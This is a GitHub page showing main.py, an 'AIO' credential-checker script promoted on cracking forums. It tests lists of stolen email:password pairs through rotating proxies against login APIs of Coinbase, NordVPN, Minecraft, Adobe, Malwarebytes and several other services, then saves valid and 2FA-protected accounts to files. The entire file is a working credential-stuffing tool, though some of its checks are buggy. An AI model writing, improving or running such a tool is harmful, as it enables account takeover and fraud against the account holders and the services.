-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathmain.py
386 lines (347 loc) · 10.3 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
import os
from os import system, name
import json
try:
import requests
except:
system('pip install requests')
import requests
try:
import random
except :
system('pip install random')
import random
try:
import time
from time import sleep
except :
system('pip install time')
import time
from time import sleep
try :
with open("config.json") as config:
config = json.load(config)
log = config["log"]
deletecombo=config["deletecombo"]
except:
print('Download the Config in https://raw.githubusercontent.com/bearbearteam/python-aio/main/config.json ! ')
time.sleep(5)
exit()
def clear():
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def save():
with open('config.json', 'w+') as f:
json.dump(config, f)
class counter:
invalid = 0
hits = 0
free = 0
free2fa = 0
def loadcounter():
hits = str(counter.hits)
invalid = str(counter.invalid)
free = str(counter.free)
free2fa = str(counter.free2fa)
clear()
print(' Aio Status')
print(' Hits : '+hits)
print(' Invalids : '+invalid)
print(' Free : '+free)
print(' 2fa : '+free2fa)
clear()
def Funimation(combo,proxy):
x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'okhttp/3.12.1',
}
)
url = 'https://prod-api-funimationnow.dadcdigital.com/api/auth/login/'
data ={"email":x,"password":y}
r = requests.post(url, json=data,headers=headers)
if 'Failed Authentication' or 'false' in r.text:
status = 'false'
elif 'token' in r.text:
status = 'true'
elif r.status_code ==429:
status = 'false'
return status
def supercell(combo,proxy):
x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
}
)
url = 'https://mvfldg522i.execute-api.us-east-1.amazonaws.com/production/customers/login'
data ={"email":x}
r = requests.post(url, json=data,headers=headers)
if 'Bad request' in r.text:
status = 'false'
elif '{}' in r.text:
status = 'true'
elif r.status_code ==429:
status = 'false'
else :
status = 'false'
return status
def minecraft(combo,proxy):
x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
}
)
url = 'https://authserver.mojang.com/authenticate'
data ={"captcha":"","captchaSupported":"","password":y,"requestUser":"true","username":x}
r = requests.post(url, json=data,headers=headers)
if 'error' in r.text:
status = 'false'
elif 'accessToken' in r.text:
status = 'true'
elif r.status_code ==429:
status = 'false'
else :
status = 'false'
return status
def adobevm(combo,proxy):
x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'X-IMS-CLIENTID': 'ngl_acrobat_reader1',
}
)
url = 'https://auth.services.adobe.com/signin/v2/users/accounts'
data ={"username":x}
r = requests.post(url, json=data,headers=headers)
if '[]' in r.text:
status = 'false'
elif 'id' in r.text:
status = 'true'
elif r.status_code ==429:
status = 'false'
else :
status = 'false'
return status
def malwarebytes(combo,proxy):
x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'MBAM/4.4.10.144 (build: 1.0.1499; Windows 10.0.19043)',
}
)
url = 'https://my-sso.malwarebytes.com/auth'
data ={"email": x, "password": y, "generate_holocron_token": 'true'}
r = requests.post(url, json=data, proxies=proxy,headers=headers)
if '"success":false' in r.text:
status = 'false'
elif '"success":true' in r.text:
status = 'true'
else :
status = 'false'
return status
def coinbase(combo,proxy):
x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'CoinbasePro/1.0.85 (com.coinbase.pro; build:1008501; iOS 15.0)',
}
)
url = 'https://api.coinbase.com/oauth/authorize/with-credentials'
data ={"client_id":"2d06b9a69c15e183856ff52c250281f6d93f9abef819921eac0d8647bb2b61f9","password":y,"username":x}
r = requests.post(url, json=data, proxies=proxy,headers=headers)
if 'param_required' or 'incorrect_credentials' in r.text:
status = 'false'
elif 'success' in r.text:
status = 'true'
elif '2fa_required' in r.text:
status = '2fa'
else :
status = 'false'
return status
def picstart(combo,proxy):
x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
}
)
url = 'https://api.picsart.com/users/signin.json'
data = {"email":x,"password":y,"provider":"picsart"}
r = requests.post(url, json=data, proxies=proxy,headers=headers)
if 'incorrect' in r.text:
status = 'false'
elif 'success' in r.text:
status = 'true'
else :
status = 'false'
return status
def curiositystream(combo,proxy):
x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
}
)
url = 'https://api.curiositystream.com/v1/login/'
data = {"email":x,"password":y}
r = requests.post(url, json=data, proxies=proxy,headers=headers)
if 'error' in r.text:
status = 'false'
elif 'success' in r.text:
status = 'true'
else :
status = 'false'
return status
def nordvpn(combo,proxy):
x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'NordApp iOS (applestore/5.0.5) iOS/13.3.1',
}
)
url = "https://zwyr157wwiu6eior.com/v1/users/tokens"
data = "password="+x+"&username="+y
r = requests.post(url, json=data, proxies=proxy,headers=headers)
if 'Invalid username' in r.text:
status = 'false'
elif 'token' in r.text:
status = 'true'
else :
status = 'false'
return status
def geoguessr(combo,proxy):
x,y = combo.split(":", 1)
headers = requests.utils.default_headers()
headers.update(
{
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
}
)
url = 'https://www.geoguessr.com/api/v3/accounts/signin'
email = x
password = y
data = {"email":email,"password":password}
r = requests.post(url, json=data, proxies=proxy,headers=headers)
if 'Hmm' in r.text:
status = 'false'
if 'created' in r.text:
status = 'true'
else:
status = 'false'
return status
def proxy_loader(proxyfile):
lines = open(proxyfile).read().splitlines()
proxy =random.choice(lines)
proxies = {"http": proxy}
return proxies
def combo_loader():
print('\nModules:\n1 : GeoGussr\n2 : Curiosity Stream\n3 : NordVPN\n4 : Picstart\n5 : Coinbase\n6 : malwarebytes\n7 : Adobe VM\n8 : Minecraft\n9 : SuperCell VM\n10 : Funimation\nS : Settings')
module = input('Please input module number : ')
if module == 'S':
print('Settings Page')
settingsmodule = input('1 : Log hits\n2 : Delete Combo File after checking\n->')
if settingsmodule== '1':
print('Do you want to log hits(print out)')
logging = input('1 : yes\n2 : no\n-> ')
config["log"] = logging
if settingsmodule == '2':
print('Do you want to delete combo file after checcking')
logging = input('1 : yes\n2 : no\n-> ')
config["deletecombo"] = logging
print('Logging down your awnser,closing window after done! ')
save()
time.sleep(5)
exit()
file = input(('Please input your combo file : '))
file2 = input(('Please input your proxy file(Only Http) : '))
try:
f = open(file2,"r")
f = open(file, "r")
except:
exit()
f = open(file, "r")
for x in f:
proxyoutput = proxy_loader(file2)
if module == '1':
output = geoguessr(x,proxyoutput)
elif module == '2':
output = curiositystream(x,proxyoutput)
elif module == '3':
output = nordvpn(x,proxyoutput)
elif module == '4':
output = picstart(x,proxyoutput)
elif module == '5':
output = coinbase(x,proxyoutput)
elif module == '6':
output = malwarebytes(x,proxyoutput)
elif module == '7':
output = adobevm(x,proxyoutput)
elif module == '8':
output = minecraft(x,proxyoutput)
elif module == '9':
output = supercell(x,proxyoutput)
elif module == '10':
output = Funimation(x,proxyoutput)
else:
print('Bruh,Chose a Valid module')
time.sleep(10)
quit()
if output == 'true' :
counter.hits +=1
if log == "1":
print('valid : '+ x )
else:
loadcounter()
isdir = os.path.isdir('results')
if isdir == False :
os.mkdir('results')
f = open('results/valid.txt','a+')
accountwrite = (x+'\n')
f.write(accountwrite)
elif output == '2fa':
counter.free2fa +=1
if log == "1":
print('2fa : '+ x )
else:
loadcounter()
isdir = os.path.isdir('results')
if isdir == False :
os.mkdir('results')
f = open('results/2fa.txt','a+')
accountwrite = (x+'\n')
f.write(accountwrite)
elif output == 'false':
counter.invalid +=1
if log == "1":
print('invalid : '+ x )
else:
loadcounter()
else:
print(output)
return file
print('Welcome to AIO checker by cracked.to/lamlucius8')
sleep(5)
output = combo_loader()
if deletecombo == '1':
os.remove(output)
e = open('Nothing.txt','a+')
pogchamp = ('Rep me on Cracked.io! cracked.io/lamlucius8 !!!!! ')
e.write(pogchamp)
print('All valid accounts will be in results folder valid.txt')
sleep(15)